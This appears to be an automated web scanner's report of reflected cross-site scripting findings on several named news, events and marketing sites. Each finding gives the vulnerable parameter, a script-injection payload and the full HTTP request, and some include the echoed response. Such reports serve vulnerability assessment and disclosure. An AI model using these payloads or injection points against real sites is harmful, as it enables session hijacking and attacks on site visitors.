The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2176b"><script>alert(1)</script>81ec6443090 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?keyword=online%20banking?adid=640302&2176b"><script>alert(1)</script>81ec6443090=1 HTTP/1.1 Host: easycheckingbanking.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5d90"><script>alert(1)</script>0368ae71355 was submitted in the REST URL parameter 5. This input was echoed as f5d90\"><script>alert(1)</script>0368ae71355 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/o-c-in-top-three-for-job-growth/48434f5d90"><script>alert(1)</script>0368ae71355/ HTTP/1.1 Host: economy.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:05:20 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://economy.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:05:21 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 45451
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Handling Hard Times - www.ocregister.com" href="http://economy.ocregister.com/2011/02/03/o-c-in-top-three-for-job-growth/48434f5d90\"><script>alert(1)</script>0368ae71355/feed/" /> ...[SNIP]...
1.118. http://economy.ocregister.com/2011/02/03/o-c-in-top-three-for-job-growth/48434/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44f2c"><script>alert(1)</script>737289185c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 44f2c\"><script>alert(1)</script>737289185c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/o-c-in-top-three-for-job-growth/48434/?44f2c"><script>alert(1)</script>737289185c2=1 HTTP/1.1 Host: economy.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:05:05 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://economy.ocregister.com/xmlrpc.php Link: <http://economy.ocregister.com/?p=48434>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 64744
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... " type="application/rss+xml" title=" O.C. in top three for job growth - Handling Hard Times - www.ocregister.com" href="http://economy.ocregister.com/2011/02/03/o-c-in-top-three-for-job-growth/48434/?44f2c\"><script>alert(1)</script>737289185c2=1feed/" /> ...[SNIP]...
1.119. http://events.cbs6albany.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.cbs6albany.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2aef0"><script>alert(1)</script>a10a5ec7939 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?2aef0"><script>alert(1)</script>a10a5ec7939=1 HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/?2aef0"><script>alert(1)</script>a10a5ec7939=1" /> ...[SNIP]...
1.120. http://events.ocregister.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.ocregister.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9e5a"><script>alert(1)</script>8d769312283 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?f9e5a"><script>alert(1)</script>8d769312283=1 HTTP/1.1 Host: events.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
The value of the jsonsp request parameter is copied into the HTML document as plain text between tags. The payload 89933<script>alert(1)</script>7b37a8f386f was submitted in the jsonsp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.122. http://events.ocregister.com/movies [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.ocregister.com
Path:
/movies
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94f3e"><script>alert(1)</script>ceef51fea12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /movies?94f3e"><script>alert(1)</script>ceef51fea12=1 HTTP/1.1 Host: events.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/movies?94f3e"><script>alert(1)</script>ceef51fea12=1" /> ...[SNIP]...
1.123. http://events.ocregister.com/restaurants [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.ocregister.com
Path:
/restaurants
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a3ab"><script>alert(1)</script>f73c13b2255 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /restaurants?6a3ab"><script>alert(1)</script>f73c13b2255=1 HTTP/1.1 Host: events.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
The value of the st_select request parameter is copied into the HTML document as plain text between tags. The payload 7c80e<script>alert(1)</script>e0b48eab0cb was submitted in the st_select parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event7c80e<script>alert(1)</script>e0b48eab0cb&search=true&svt=text&srss= HTTP/1.1 Host: events.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
The value of the st_select request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f25f"><script>alert(1)</script>de56addb30 was submitted in the st_select parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event1f25f"><script>alert(1)</script>de56addb30&search=true&svt=text&srss= HTTP/1.1 Host: events.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
The value of the st_select request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d737d'%3balert(1)//cee44e0808f was submitted in the st_select parameter. This input was echoed as d737d';alert(1)//cee44e0808f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=eventd737d'%3balert(1)//cee44e0808f&search=true&svt=text&srss= HTTP/1.1 Host: events.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
The value of the st_select request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 744e1"%3balert(1)//1e62870ad6d was submitted in the st_select parameter. This input was echoed as 744e1";alert(1)//1e62870ad6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event744e1"%3balert(1)//1e62870ad6d&search=true&svt=text&srss= HTTP/1.1 Host: events.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
The value of the svt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66943"><script>alert(1)</script>2a358999d52 was submitted in the svt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event&search=true&svt=text66943"><script>alert(1)</script>2a358999d52&srss= HTTP/1.1 Host: events.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
The value of the swhat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd510</script><a%20b%3dc>535a6ed6f38 was submitted in the swhat parameter. This input was echoed as bd510</script><a b=c>535a6ed6f38 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search?swhat=superbowl11bd510</script><a%20b%3dc>535a6ed6f38&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event&search=true&svt=text&srss= HTTP/1.1 Host: events.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
The value of the swhat request parameter is copied into the HTML document as plain text between tags. The payload 36469<a%20b%3dc>2719cbb6ab was submitted in the swhat parameter. This input was echoed as 36469<a b=c>2719cbb6ab in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /search?swhat=superbowl1136469<a%20b%3dc>2719cbb6ab&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event&search=true&svt=text&srss= HTTP/1.1 Host: events.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... &new=n&search=true&srad=30&srss=&st=any&st_select=event&svt=text&swhat=superbowl1136469%3Ca+b%3Dc%3E2719cbb6ab&swhen=&swhere=Irvine%2CCA">Search for "superbowl1136469<a b=c>2719cbb6ab" in all products</a> ...[SNIP]...
The value of the swhen request parameter is copied into the HTML document as plain text between tags. The payload 85df0<script>alert(1)</script>404a1997572 was submitted in the swhen parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search?swhat=superbowl11&swhen=85df0<script>alert(1)</script>404a1997572&swhere=Irvine%2CCA&commit=Search&st_select=event&search=true&svt=text&srss= HTTP/1.1 Host: events.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <div id="error_message"> Unrecognized date format: 85df0<script>alert(1)</script>404a1997572 is not recognized as a valid time. Here are some examples of times that we recognize:<ul style='padding-left:15px;'> ...[SNIP]...
The value of the swhere request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a218c"%3balert(1)//25febe7845a was submitted in the swhere parameter. This input was echoed as a218c";alert(1)//25febe7845a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCAa218c"%3balert(1)//25febe7845a&commit=Search&st_select=event&search=true&svt=text&srss= HTTP/1.1 Host: events.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
1.133. http://events.ocregister.com/venues [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.ocregister.com
Path:
/venues
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49e9d"><script>alert(1)</script>a5e0ca94175 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /venues?49e9d"><script>alert(1)</script>a5e0ca94175=1 HTTP/1.1 Host: events.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/venues?49e9d"><script>alert(1)</script>a5e0ca94175=1" /> ...[SNIP]...
1.134. http://events.orangecounty.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.orangecounty.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcc4c"><script>alert(1)</script>b1440f97378 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?fcc4c"><script>alert(1)</script>b1440f97378=1 HTTP/1.1 Host: events.orangecounty.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c0a2"><script>alert(1)</script>02b7ab40d5d was submitted in the REST URL parameter 5. This input was echoed as 1c0a2\"><script>alert(1)</script>02b7ab40d5d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/865141c0a2"><script>alert(1)</script>02b7ab40d5d/ HTTP/1.1 Host: fastfood.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:05:49 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://fastfood.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:05:52 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 64068
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... ication/rss+xml" title=" Page not found - Fast Food Maven - www.ocregister.com" href="http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/865141c0a2\"><script>alert(1)</script>02b7ab40d5d/feed/" /> ...[SNIP]...
1.136. http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ef48"><script>alert(1)</script>95bfb7dccc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3ef48\"><script>alert(1)</script>95bfb7dccc8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48"><script>alert(1)</script>95bfb7dccc8=1 HTTP/1.1 Host: fastfood.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:05:33 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://fastfood.ocregister.com/xmlrpc.php Link: <http://fastfood.ocregister.com/?p=86514>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 78253
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... of eco-friendly, food delivery bikes - Fast Food Maven - www.ocregister.com" href="http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48\"><script>alert(1)</script>95bfb7dccc8=1feed/" /> ...[SNIP]...
1.137. http://gsbmtg.rtrk.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://gsbmtg.rtrk.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 328ed"><script>alert(1)</script>27d26f5a006 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?scid=1794971&328ed"><script>alert(1)</script>27d26f5a006=1 HTTP/1.1 Host: gsbmtg.rtrk.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:11:14 GMT Server: Apache Set-Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308111464447; domain=.rtrk.com; path=/ Set-Cookie: RlocalHilite=kw_hilite_off%3D0; domain=.rtrk.com; path=/ Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/ P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR", policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Vary: Accept-Encoding Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:40:06 GMT;path=/;httponly Content-Length: 2952
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47d57"><script>alert(1)</script>3b3d1a7631b was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=69682947d57"><script>alert(1)</script>3b3d1a7631b&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1 Host: gsbmtg.rtrk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:15:36 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Connection: close Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:28 GMT;path=/;httponly Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
